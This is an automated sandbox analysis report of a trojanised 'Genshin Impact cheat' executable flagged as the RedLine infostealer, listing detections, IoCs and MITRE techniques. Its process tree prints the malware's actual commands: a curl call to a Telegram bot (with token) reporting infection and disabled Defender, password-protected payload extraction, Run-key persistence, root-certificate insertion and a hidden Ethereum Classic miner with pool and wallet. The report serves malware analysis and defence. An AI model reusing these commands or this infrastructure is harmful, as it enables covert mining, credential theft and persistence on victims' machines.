redline | c8d7412885e4a009a4faf5937c43fa0ded78f72c533530197d3bc77154dde086

Analysis

max time kernel
137s
max time network
143s
platform
windows7_x64
resource
win7-en-20211014
submitted
05-12-2021 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GenshinImpactCheatV5.2_ByCOREXIM42.exe
Size

1.6MB
MD5

9c2d8d410d7e63b73a5d9b486596068a
SHA1

325e5bbce0e56fdac720ddbc58d6167b5528b4eb
SHA256

c8d7412885e4a009a4faf5937c43fa0ded78f72c533530197d3bc77154dde086
SHA512

e6b981a88ed67907f1b5bbb7a49169fdd09c92711b20b536f93bcffe4e4a6e5fed9b91c0359e514a008b35878fbde774b5e3a87cdc7098aecc186a53610a7f3d

Score

10^/10

redline discovery evasion infostealer persistence spyware stealer trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1668-104-0x0000000000400000-0x00000000007FA000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

filename.exe7z.exe7z.exeRegHost.exe7z.exe7z.exe

pid process

1988 filename.exe
1952 7z.exe
1672 7z.exe
1556 RegHost.exe
1828 7z.exe
804 7z.exe

pid	process
1988	filename.exe
1952	7z.exe
1672	7z.exe
1556	RegHost.exe
1828	7z.exe
804	7z.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\filename.exe	upx
\Users\Admin\AppData\Local\Temp\filename.exe	upx
C:\Users\Admin\AppData\Local\Temp\filename.exe	upx
\Users\Admin\AppData\Local\Temp\filename.exe	upx
C:\Users\Admin\AppData\Local\Temp\filename.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GenshinImpactCheatV5.2_ByCOREXIM42.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GenshinImpactCheatV5.2_ByCOREXIM42.exe

Loads dropped DLL 11 IoCs

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.execmd.exe7z.exe7z.exeexplorer.execmd.exe7z.exe7z.exe

pid	process
1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe
1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe
1916
1408	cmd.exe
1952	7z.exe
1672	7z.exe
1644	explorer.exe
1644	explorer.exe
984	cmd.exe
1828	7z.exe
804	7z.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

filename.exeRegHost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	filename.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	RegHost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GenshinImpactCheatV5.2_ByCOREXIM42.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

bfsvc.exeexplorer.exebfsvc.exeexplorer.exe

pid process

1068 bfsvc.exe
1068 bfsvc.exe
1068 bfsvc.exe
1068 bfsvc.exe
1644 explorer.exe
1644 explorer.exe
892 bfsvc.exe
1912 explorer.exe

pid	process
1068	bfsvc.exe
1068	bfsvc.exe
1068	bfsvc.exe
1068	bfsvc.exe
1644	explorer.exe
1644	explorer.exe
892	bfsvc.exe
1912	explorer.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

filename.exeRegHost.exe

description	pid	process	target process
PID 1988 set thread context of 1068	1988	filename.exe	bfsvc.exe
PID 1988 set thread context of 1644	1988	filename.exe	explorer.exe
PID 1556 set thread context of 892	1556	RegHost.exe	bfsvc.exe
PID 1556 set thread context of 1912	1556	RegHost.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

filename.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	filename.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	filename.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	filename.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	filename.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.exeexplorer.exe

pid process

1668 GenshinImpactCheatV5.2_ByCOREXIM42.exe
1644 explorer.exe
1644 explorer.exe
1644 explorer.exe
1644 explorer.exe
1644 explorer.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.exe7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe
Token: SeRestorePrivilege	1952	7z.exe
Token: 35	1952	7z.exe
Token: SeSecurityPrivilege	1952	7z.exe
Token: SeSecurityPrivilege	1952	7z.exe
Token: SeRestorePrivilege	1672	7z.exe
Token: 35	1672	7z.exe
Token: SeSecurityPrivilege	1672	7z.exe
Token: SeSecurityPrivilege	1672	7z.exe
Token: SeRestorePrivilege	1828	7z.exe
Token: 35	1828	7z.exe
Token: SeSecurityPrivilege	1828	7z.exe
Token: SeSecurityPrivilege	1828	7z.exe
Token: SeRestorePrivilege	804	7z.exe
Token: 35	804	7z.exe
Token: SeSecurityPrivilege	804	7z.exe
Token: SeSecurityPrivilege	804	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

GenshinImpactCheatV5.2_ByCOREXIM42.exefilename.execmd.execmd.exe

description	pid	process	target process
PID 1668 wrote to memory of 1988	1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe	filename.exe
PID 1668 wrote to memory of 1988	1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe	filename.exe
PID 1668 wrote to memory of 1988	1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe	filename.exe
PID 1668 wrote to memory of 1988	1668	GenshinImpactCheatV5.2_ByCOREXIM42.exe	filename.exe
PID 1988 wrote to memory of 1120	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 1120	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 1120	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 1408	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 1408	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 1408	1988	filename.exe	cmd.exe
PID 1408 wrote to memory of 1952	1408	cmd.exe	7z.exe
PID 1408 wrote to memory of 1952	1408	cmd.exe	7z.exe
PID 1408 wrote to memory of 1952	1408	cmd.exe	7z.exe
PID 1988 wrote to memory of 780	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 780	1988	filename.exe	cmd.exe
PID 1988 wrote to memory of 780	1988	filename.exe	cmd.exe
PID 780 wrote to memory of 1672	780	cmd.exe	7z.exe
PID 780 wrote to memory of 1672	780	cmd.exe	7z.exe
PID 780 wrote to memory of 1672	780	cmd.exe	7z.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1068	1988	filename.exe	bfsvc.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe
PID 1988 wrote to memory of 1644	1988	filename.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\GenshinImpactCheatV5.2_ByCOREXIM42.exe
"C:\Users\Admin\AppData\Local\Temp\GenshinImpactCheatV5.2_ByCOREXIM42.exe"
1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\AppData\Local\Temp\filename.exe
"C:\Users\Admin\AppData\Local\Temp\filename.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5035615488:AAH5LgzihOFN5Hq7aGBUpC9wJ4V94wk_t9A/sendMessage?chat_id=2097201889&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
3⤵
PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1408

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Suspicious use of WriteProcessMemory
PID:780

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x87083e64D7F1e3f970017b55726491867943088A -coin etc -worker EasyMiner_Bot -clKernel 3
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1068

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x87083e64D7F1e3f970017b55726491867943088A -coin etc -worker EasyMiner_Bot -clKernel 3
3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1644

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Loads dropped DLL
PID:984

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
PID:1220

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:804

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x87083e64D7F1e3f970017b55726491867943088A -coin etc -worker EasyMiner_Bot -clKernel 3
5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:892

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x87083e64D7F1e3f970017b55726491867943088A -coin etc -worker EasyMiner_Bot -clKernel 3
5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
MD5
7191cb07394cb5a7d94d627d1d3bee17

SHA1
c79ebdd9c2c02c7cc3fa28117f2ca1f2389687b3

SHA256
d9a942627e83efe031ae997312550ddc6445e779d4088031f8380ad00f7c1da3

SHA512
68068141ee7c9a2c17f9b4089967b4565e08771a5d897c3d6311eb97639db6690ed649fc8c69e8137ce8f1f363dce112822c97924bda25469ed930dad34cb0a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
MD5
119bfbf39cb75dfe23bfceb01a3104b7

SHA1
1eaa278dbc6a1c8d9463757cea5082518f7f673f

SHA256
e88356405fe7e1150144aaa56474ad1f68e0fef3a76647cddfc143c859e2856c

SHA512
f992fba29466c59e060ee35feb638a69ef25c536c2271cdcad1fccbdb84161e3eb49a8d27c5d75fdcc290367271632062dc54f2108afa9bf711cde58eba26146

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
acaeda60c79c6bcac925eeb3653f45e0

SHA1
2aaae490bcdaccc6172240ff1697753b37ac5578

SHA256
6b0ceccf0103afd89844761417c1d23acc41f8aebf3b7230765209b61eee5658

SHA512
feaa6e7ed7dda1583739b3e531ab5c562a222ee6ecd042690ae7dcff966717c6e968469a7797265a11f6e899479ae0f3031e8cf5bebe1492d5205e9c59690900

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
MD5
15092557fcf7db9fd811a776f81700d0

SHA1
55c32f4742e63a31fe8f349aae4ec2c822c92f3e

SHA256
a312faa9d394569eae83c1d4a3554c29fa7c445e76304e7831144f3c5f98994e

SHA512
56743843501691f9fc54ce64707d4b53f755a13997dadfb2809bd423295ec5746df2f606266dd75de1b895b75a5cf211ebd86a15f90aa81149ee4a5725bfa23e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
MD5
df298403abeb8e6226bfdc943ae82a5c

SHA1
52bae1eca9d84283481ce7b43e1f666850a766eb

SHA256
b3e44fa7ea3b8ce68a3913678858cacc2aa47e61facf1b278ddf735a21183285

SHA512
5fbbd95dbdfd3eff184559f3897b59769a8a0f36faea6c531af4f17ec4afb9e53cb38c1eceef81ca89818fd057da9a1caf51985b15efba067674d7b2ccab78d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
MD5
3a4f5aaf670577bec8b61e92eb5a7715

SHA1
